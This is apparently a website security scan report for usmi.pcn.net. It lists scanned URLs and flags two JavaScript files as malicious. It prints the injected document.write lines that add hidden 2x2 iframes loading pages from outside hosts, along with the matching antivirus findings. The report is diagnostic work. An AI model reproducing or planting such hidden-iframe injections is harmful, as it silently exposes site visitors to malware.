Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=usmi.pcn.net
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.usmi.pcn.net/ | HTTP/1.1 200 OK Connection: close Date: Thu, 26 Feb 2015 11:33:52 GMT Accept-Ranges: bytes ETag: "4f857a-431-4eca0fff5fd17" Server: Apache/2.2.15 (CentOS) Content-Length: 1073 Content-Type: text/html Last-Modified: Tue, 03 Dec 2013 13:09:00 GMT | clean |
http://www.usminazionale.it/ | HTTP/1.1 200 OK Date: Thu, 26 Feb 2015 11:06:09 GMT Accept-Ranges: bytes ETag: "3274fa74eb50d01:22c2" Server: Microsoft-IIS/6.0 Content-Length: 86282 Content-Location: http://www.usminazionale.it/index.html Content-Type: text/html Last-Modified: Wed, 25 Feb 2015 11:09:00 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.usminazionale.it/index.html | 200 OK Content-Length: 86282 Content-Type: text/html | clean |
http://www.usminazionale.it/js/time.js | 200 OK Content-Length: 805 Content-Type: application/x-javascript | clean |
http://www.usmi.pcn.net/js/menustyle.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.usmi.pcn.net/test404page.js | 404 Not Found Content-Length: 294 Content-Type: text/html | clean |
http://www.usmi.pcn.net/js/script.js | 200 OK Content-Length: 4968 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=433934></iframe>');
<!-- FUNCTIONS FOR DHTML DISPLAY
<!-- creation of the Browser class to define the browser type
function Browser() { this.n4 = (document.layers) ? 1 : 0; this.ie = (document.all) ? 1 : 0; this.n6 = (document.getElementById) ? 1 : 0; }
<!-- defi visit++; SetCookie("dhtmlFlash", visit, expdate, "/", null, false); if(visit > 1){ visitato = true; }else{ visitato = false; } }
<!-- function to reset the cookie //-->
function ResetCounts() { var expdate = new Date(); expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000 * 365)); visit = 0; SetCookie("dhtmlFlash", visit, expdate , "/", null, false); leapto(); }
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=433934
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=433934>
http://www.usmi.pcn.net/animate.js | 200 OK Content-Length: 14586 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=433934></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=433934></iframe>');
<!-- dynamicanimAttr = "dynamicanimation" animCancel = "skipanim" fpanimationPrefix = "fpAnim" animat
var ms = navigator.appVersion.indexOf("MSIE") ie4 = (ms>0) && (parseInt(navigator.appVersion.substring(ms+5, ms+6)) >= 4) if(ie4) { ts=el.style.cssText el.style.cssText=el.fprolloverstyle el.fprolloverstyle=ts } }
function clickSwapImg(el) { if(document.all || document.layers) { ts=el.src el.src=el.lowsrc el.lowsrc=ts } }
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=433934
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=433934>
Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=433934
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=433934>
http://www.usmi.pcn.net//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js/ | 404 Not Found Content-Length: 338 Content-Type: text/html | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 115360 Content-Type: application/javascript | clean |
http://codice.shinystat.it/cgi-bin/getcod.cgi?USER=usmiweb | 200 OK Content-Length: 5607 Content-Type: application/x-javascript | clean |
http://www.fides.org/services/jsnews.php?lan=ita&nn=3 | 404 Not Found Content-Length: 5873 Content-Type: text/html | clean |
http://www.fides.org/it | 200 OK Content-Length: 13925 Content-Type: text/html | clean |
http://www.fides.org/es | 200 OK Content-Length: 14148 Content-Type: text/html | clean |
http://www.fides.org/en | 200 OK Content-Length: 13722 Content-Type: text/html | clean |
http://www.fides.org/fr | 200 OK Content-Length: 15081 Content-Type: text/html | clean |
http://www.fides.org/pt | 200 OK Content-Length: 13627 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: usmi.pcn.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: usmi.pcn.net
Referer: http://www.google.com/search?q=usmi.pcn.net
Result:
The result is similar to the first query. There are no suspicious redirects found.